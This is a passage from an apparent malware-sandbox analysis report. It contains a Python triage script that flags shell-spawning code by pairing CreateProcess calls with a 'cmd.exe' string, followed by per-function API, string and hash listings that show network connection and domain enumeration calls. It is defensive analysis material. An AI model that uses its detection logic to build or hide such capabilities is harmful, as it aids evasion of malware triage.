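                f = m.group(1).split(".")
                blk.region = Region(int(f[3], 16), PAGE_PROTECT.get(int(f[4], 16), f[4]),
                                    MEM_TYPE.get(int(f[6], 16), f[6]), m.group(2) == "true")
        elif state == "Similarity" and line.startswith("• String ID:"):
            payload = line.split(":", 1)[1][1:]                  # drop the one separator space
            blk.strings = [s for s in payload.split("$") if s]   # "$" joins the strings
    if cfg:
        _parse_cfg(" ".join(cfg), blk)
    return blk

def spawns_shell(blk):
    """Triage rule: a CreateProcess* export reachable from the block plus a cmd.exe string."""
    creates = any(n.startswith("CreateProcess") for n in blk.api_names())
    return creates and any("cmd.exe" in s.lower() for s in blk.strings)

def file_paths(blk):
    """Drive-letter paths among the block's strings (c:\\skips.txt in the first block above)."""
    return [s for s in blk.strings if re.match(r"^[A-Za-z]:\\", s)]
```

Two caveats when using a hit from this rule. The combination DuplicateHandle, CreateProcessA, "cmd.exe", "/c " and a TerminateProcess fallback through 0xB2514F is consistent with the MSVC C runtime's own `_popen`-style helper, so the block shows that the sample can run shell commands, not which command it runs; that has to come from the caller or from the process-tree and dropped-file sections of the report. And because the region decodes to MEM_IMAGE with "based on PE: true", this code is part of the on-disk image rather than unpacked at runtime, so a static string scan of the sample should find "cmd.exe" and "c:\skips.txt" as well.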

                                                                                                        Control-flow Graph
                                                                                                        • Entry 0xB38AA3 (nodes 8110-8216)
                                                                                                        • Win32 APIs in node labels: GetConsoleMode (0xB38D2A-0xB38D39); ReadConsoleW (0xB38D41-0xB38D5B) with GetLastError at 0xB38D5D; ReadFile (0xB38D8B-0xB38DA3) with GetLastError at 0xB38DFF-0xB38E0A
                                                                                                        • Internal callees: 0xB259A0, 0xB259B3, 0xB25122, 0xB35B94, 0xB34D66, 0xB38FF6, 0xB3FC47, 0xB2597D, 0xB387BF, 0xB385FF, 0xB3890F
                                                                                                        • Note: the report gives no APIs section and an empty API ID for this block, so the node labels above are the only record of these four calls.
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3907804496
                                                                                                        • Opcode ID: 5751a52ed5f0d7fbb0f78e401fd9c2d7b5d1df585cffb27fa1e35e33dcaae405
                                                                                                        • Instruction ID: bd18538ab1955801852d3dc603f0871a5977c3e6178985ed1a0ac22aea4e7577
                                                                                                        • Opcode Fuzzy Hash: 5751a52ed5f0d7fbb0f78e401fd9c2d7b5d1df585cffb27fa1e35e33dcaae405
                                                                                                        • Instruction Fuzzy Hash: 25C19170E04359AFDB11DFA8D881BADBBF0AF19310F2841D9F454A7392CB759941CB62

                                                                                                        Control-flow Graph
                                                                                                        • Entry 0xB40690 (nodes 8218-8281)
                                                                                                        • Win32 APIs in node labels: GetLastError (0xB4078B-0xB407B1 and 0xB40966-0xB40992); GetFileType (0xB407B6-0xB407BF); GetLastError + CloseHandle (0xB407C1-0xB407F2); CloseHandle (0xB40931-0xB40964); CreateFileW is reached through the 0xB4035E subcall (see APIs)
                                                                                                        • Internal callees: 0xB403F3, 0xB259A0, 0xB3CC7E, 0xB259B3, 0xB4035E (three call sites: 0xB40700, 0xB4075C, 0xB40931), 0xB2597D, 0xB3CBC7, 0xB40111, 0xB4056F, 0xB3595D, 0xB3CD90
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B4035E: CreateFileW.KERNEL32(00000000,00000000,?,00B40739,?,?,00000000,?,00B40739,00000000,0000000C), ref: 00B4037B
                                                                                                        • GetLastError.KERNEL32 ref: 00B407A4
                                                                                                        • __dosmaperr.LIBCMT ref: 00B407AB
                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00B407B7
                                                                                                        • GetLastError.KERNEL32 ref: 00B407C1
                                                                                                        • __dosmaperr.LIBCMT ref: 00B407CA
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B407EA
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B40934
                                                                                                        • GetLastError.KERNEL32 ref: 00B40966
                                                                                                        • __dosmaperr.LIBCMT ref: 00B4096D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                        • String ID: H
                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                        • Opcode ID: 8c1b3c876411467e4c6458372c6b9c8d8f48292fbc6ff881cd6e9ece8921009b
                                                                                                        • Instruction ID: 5a7425ce851c5c21f425de9233cd32a1e4982cf7e3088fa50051ff837596ea26
                                                                                                        • Opcode Fuzzy Hash: 8c1b3c876411467e4c6458372c6b9c8d8f48292fbc6ff881cd6e9ece8921009b
                                                                                                        • Instruction Fuzzy Hash: 40A15832A242149FDF19EF6CD8427AD7BF0EB06320F14018DE911AB3A1DB358E52DB91

                                                                                                        Control-flow Graph
                                                                                                        • Entry 0xB376C2 (nodes 8286-8368)
                                                                                                        • Win32 APIs in node labels: none; 0xB44D80 (_strrchr, per the refs under APIs) is called from 0xB37701-0xB37727 (×2), 0xB37735-0xB37741 and 0xB377C2-0xB377D6, and the error path 0xB378D2-0xB378DC calls 0xB2514F (the TerminateProcess helper listed under APIs)
                                                                                                        • Internal callees: 0xB259B3, 0xB25122, 0xB44D80, 0xB36E62, 0xB378DD, 0xB34D09, 0xB34D66, 0xB321C2, 0xB36BE9, 0xB2514F
                                                                                                        APIs
                                                                                                        • _strrchr.LIBCMT ref: 00B37706
                                                                                                        • _strrchr.LIBCMT ref: 00B37711
                                                                                                        • _strrchr.LIBCMT ref: 00B37738
                                                                                                        • _free.LIBCMT ref: 00B3776B
                                                                                                          • Part of subcall function 00B2514F: IsProcessorFeaturePresent.KERNEL32(00000017,00B25121,?,?,00A71F07,?,?,00000016,?,?,00B2512E,00000000,00000000,00000000,00000000,00000000), ref: 00B25151
                                                                                                          • Part of subcall function 00B2514F: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 00B25173
                                                                                                          • Part of subcall function 00B2514F: TerminateProcess.KERNEL32(00000000), ref: 00B2517A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strrchr$Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                        • String ID: .com
                                                                                                        • API String ID: 1283974128-4200470757
                                                                                                        • Opcode ID: c2bbe948e71fe8aaf8c9f00aca1bf585052b5325cfdc5f5793e22da55fb0f55f
                                                                                                        • Instruction ID: 593cb6893ff9387dafdf25a48e3c664a1e588444441515a85433792c3b7afa7a
                                                                                                        • Opcode Fuzzy Hash: c2bbe948e71fe8aaf8c9f00aca1bf585052b5325cfdc5f5793e22da55fb0f55f
                                                                                                        • Instruction Fuzzy Hash: 9751E5B5A48606BADF35AA79DC46A7E7BE8DF41720F3001E9F81097291EF319E10D760

                                                                                                        Control-flow Graph
                                                                                                        • Entry 0xAAC470 (nodes 9105-9140)
                                                                                                        • Win32 APIs in node labels: none; the API ID under Similarity (std::_Lockit constructor/destructor, std::_Facet_Register, _Getctype, _Getcvt) is C++ runtime locale-facet setup
                                                                                                        • Internal callees: 0xAE5163, 0xAE51BB, 0xB005BB, 0xAE89F0, 0xB0089A, 0xA72980, 0xAE94B1, 0xAE961A, 0xA72A30, 0xAE89C4
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeGetcvtRegister
                                                                                                        • String ID:
                                                                                                        • API String ID: 2755674607-0
                                                                                                        • Opcode ID: 0212cf89b18b6b27a13ac52a72adbc61cb2cefa6362b747a3e8e11ff2cdda1fb
                                                                                                        • Instruction ID: 1515c60c48c30b629726b224a1887ccfa2e88c33cd5359e16efb84cf8c0c2b60
                                                                                                        • Opcode Fuzzy Hash: 0212cf89b18b6b27a13ac52a72adbc61cb2cefa6362b747a3e8e11ff2cdda1fb
                                                                                                        • Instruction Fuzzy Hash: 5D51E371D007458FDB10DF68CA41BAAB7F4EF19720F14425AE846A7292EB30BD45CBD1

                                                                                                        Control-flow Graph
                                                                                                        Control-flow graph of the function starting at 0x00B2C5C6 (rendered graph and executed/not-executed legend omitted; calls into b30e78, b21973, b34d09, b34d66, b2514f, b01b70, b2c5c6 (recursive), b3437a, b2b054, b01bb6, b35b94, b2c20b and b2c7b7)
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe
                                                                                                        • String ID:
                                                                                                        • API String ID: 4189289331-0
                                                                                                        • Opcode ID: ac5e8157f98b6bbfeed3009da728b03e5f8299607b3e1c380a33e0da4c06fad0
                                                                                                        • Instruction ID: 92c5c54ecd207300e1b93a81ed6519e708fac561087091b42a8bafd75e199533
                                                                                                        • Opcode Fuzzy Hash: ac5e8157f98b6bbfeed3009da728b03e5f8299607b3e1c380a33e0da4c06fad0
                                                                                                        • Instruction Fuzzy Hash: 9D510E72900215ABDB359F68AC41FAE7FE8EF49360F2442D9F81D97192DB35DD008AA4
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$CreateErrorLastPipe__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 155357802-0
                                                                                                        • Opcode ID: 7ffd507f8902ddab2c495e92ba3a2fe65595088ea7ca38f6d4106424bf40ce11
                                                                                                        • Instruction ID: 165d6109e9ecd2d53bdff15cd7b7becff54d645ebcff04b0df6984c3d405c81d
                                                                                                        • Opcode Fuzzy Hash: 7ffd507f8902ddab2c495e92ba3a2fe65595088ea7ca38f6d4106424bf40ce11
                                                                                                        • Instruction Fuzzy Hash: F7712871A106159BDB24EFBCEC4169E7BE5AF09324F288199F054DF2E2EB34D802CB50
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B35B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B17B27,?,?,?,?,?,00A71F07,?,?,?), ref: 00B35BC6
                                                                                                        • _free.LIBCMT ref: 00B31003
                                                                                                        • _free.LIBCMT ref: 00B3101A
                                                                                                        • _free.LIBCMT ref: 00B31039
                                                                                                        • _free.LIBCMT ref: 00B31054
                                                                                                        • _free.LIBCMT ref: 00B3106B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3033488037-0
                                                                                                        • Opcode ID: 2396c3280a77352dd5c1339f0dc4828fd5ef9d509f3fea1d87daed9113ae412b
                                                                                                        • Instruction ID: 460a2bb9eaf7a27a8c35c0eff3dbbec8cb065216c2a2dd7dd5582ea77fbecda7
                                                                                                        • Opcode Fuzzy Hash: 2396c3280a77352dd5c1339f0dc4828fd5ef9d509f3fea1d87daed9113ae412b
                                                                                                        • Instruction Fuzzy Hash: A6518131A00704AFDB25DF69C841B6A77F8EF59721F2449E9E849D72A0E731EA41CB50
                                                                                                        APIs
                                                                                                        • WaitForSingleObject.KERNEL32(00000010,00000000,00000000,00000000,00000000,?,?,00B24D8C,00000000,00000000,00000001,?,00B8CAC8,00000010,00A788E3,00000000), ref: 00B36C75
                                                                                                        • GetExitCodeProcess.KERNEL32(00000010,00000000), ref: 00B36C84
                                                                                                        • GetLastError.KERNEL32(?,?,00B24D8C,00000000,00000000,00000001,?,00B8CAC8,00000010,00A788E3,00000000), ref: 00B36C9B
                                                                                                        • __dosmaperr.LIBCMT ref: 00B36CBF
                                                                                                        • CloseHandle.KERNEL32(00000010,?,?,00B24D8C,00000000,00000000,00000001,?,00B8CAC8,00000010,00A788E3,00000000), ref: 00B36CD2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait__dosmaperr
                                                                                                        • String ID:
                                                                                                        • API String ID: 2013101682-0
                                                                                                        • Opcode ID: 31af5f6e9981914ebad871abbedf2231e46fe0a8f7da20608c7f2ee63a432777
                                                                                                        • Instruction ID: af13449cd0f7438deaf4a4c56713ac3ee8ba01852e8ad77483e65ef14ab44fac
                                                                                                        • Opcode Fuzzy Hash: 31af5f6e9981914ebad871abbedf2231e46fe0a8f7da20608c7f2ee63a432777
                                                                                                        • Instruction Fuzzy Hash: 80112572100B20BFC7206F689C8466AB7E8EF86770FB552D4F89883390EB318D41C7A1
                                                                                                        APIs
                                                                                                        • GetComputerNameExW.KERNEL32(00000000,?,?,AE695AF0,?), ref: 00A83941
                                                                                                        • DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?,?,00000000,?,?,?), ref: 00A839E0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ComputerDomainInformationNamePrimaryRole
                                                                                                        • String ID: Empty$_D:
                                                                                                        • API String ID: 1590873629-2874341529
                                                                                                        • Opcode ID: a1747c4278ab4466ab16713f87f7e3646aa93435d65699681e7c3d68a23b8f37
                                                                                                        • Instruction ID: 40d8893e91b33c02cd46d90e7389a998c287c1c7af63ee4b37f3c7d83bae69e2
                                                                                                        • Opcode Fuzzy Hash: a1747c4278ab4466ab16713f87f7e3646aa93435d65699681e7c3d68a23b8f37
                                                                                                        • Instruction Fuzzy Hash: 24F18971A102598BEB28EB24CD85BADB7F6FB44704F1482D8D089A7291DF759BC4CF90
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(AE695AF0,?,00000000,?), ref: 00AFCA77
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AFCB5B
                                                                                                        • GetFileAttributesW.KERNEL32(?,AE695AF0,?,?,?,?,?,?,?,00B4FCD0,000000FF,?,00A74A32), ref: 00AFCBB2
                                                                                                        Strings
                                                                                                        • boost::filesystem::status, xrefs: 00AFCB0D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesErrorException@8FileLastThrow
                                                                                                        • String ID: boost::filesystem::status
                                                                                                        • API String ID: 1873943377-3746320807
                                                                                                        • Opcode ID: b77354c3bb7cc7a7b6c546aed5031ca6f4c6dfdaebe91725041c907d8a45de55
                                                                                                        • Instruction ID: 7212112cdd705cd9ca88272084a90f65591395af7634fe9b956b50b27953bd91
                                                                                                        • Opcode Fuzzy Hash: b77354c3bb7cc7a7b6c546aed5031ca6f4c6dfdaebe91725041c907d8a45de55
                                                                                                        • Instruction Fuzzy Hash: 6841B57290020D9BCB10EFA9CD85BBEF7B5EB05764F14426AF915A7290D774AD04CB90
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNEL32(?,AE695AF0,?,?,?,?,?,?,?,00B4FCD0,000000FF,?,00A74A32), ref: 00AFCBB2
                                                                                                        • CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,02000000,00000000,?,?,?,?,?,?,?,?,00B4FCD0), ref: 00AFCC4D
                                                                                                          • Part of subcall function 00AFC860: CreateFileW.KERNEL32(00AFCC7E,00000008,00000007,00000000,00000003,02200000,00000000,AE695AF0,?,00000000,?,00AFCC7E,?), ref: 00AFC8A3
                                                                                                          • Part of subcall function 00AFC860: CloseHandle.KERNEL32(00000000), ref: 00AFC924
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00B4FCD0), ref: 00AFCC99
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00B4FCD0), ref: 00AFCCA9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseFileHandle$Create$Attributes
                                                                                                        • String ID:
                                                                                                        • API String ID: 2696689969-0
                                                                                                        • Opcode ID: c5cdf5c377fca3178b829cff9d020cd62d1dba226c5f3d1b537090204a4e6960
                                                                                                        • Instruction ID: b7d6a3383970df39f46a14dba0b23a6a9610c435f4d162ee527c621ea80d5ddc
                                                                                                        • Opcode Fuzzy Hash: c5cdf5c377fca3178b829cff9d020cd62d1dba226c5f3d1b537090204a4e6960
                                                                                                        • Instruction Fuzzy Hash: C9518F75E0021CAFDB10DFA9DA85BAEBBB4EF08724F144169F919A7381D7709905CBA0
                                                                                                        APIs
                                                                                                        • InternetConnectW.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00A863F4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConnectInternet
                                                                                                        • String ID: 0.0.0.1$`
                                                                                                        • API String ID: 3050416762-3652615328
                                                                                                        • Opcode ID: 493b9057fdc0f187f71cd4ba1f0ade388c0bf13e500b5a1a64f51a8305fc58af
                                                                                                        • Instruction ID: e9ec891402522e19be6279e43bd8f452ae3811218a55e3b76a83ca4acb71346a
                                                                                                        • Opcode Fuzzy Hash: 493b9057fdc0f187f71cd4ba1f0ade388c0bf13e500b5a1a64f51a8305fc58af
                                                                                                        • Instruction Fuzzy Hash: F951D2B0A101599BEF28EF24CD85B9DB7B6EF84304F508199F509AB2D1D774AA84CF48
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID: COMSPEC$cmd.exe
                                                                                                        • API String ID: 269201875-2256226045
                                                                                                        • Opcode ID: d6ab375d4c26ff18c3dc8e1d9d1b54ee439fcc5fe92aabd304270f56f785dc4d
                                                                                                        • Instruction ID: 9d10d31bca98be2b4e0adad88cf35f9ade79e79bd69abac529d9a2327f7d1bcb
                                                                                                        • Opcode Fuzzy Hash: d6ab375d4c26ff18c3dc8e1d9d1b54ee439fcc5fe92aabd304270f56f785dc4d
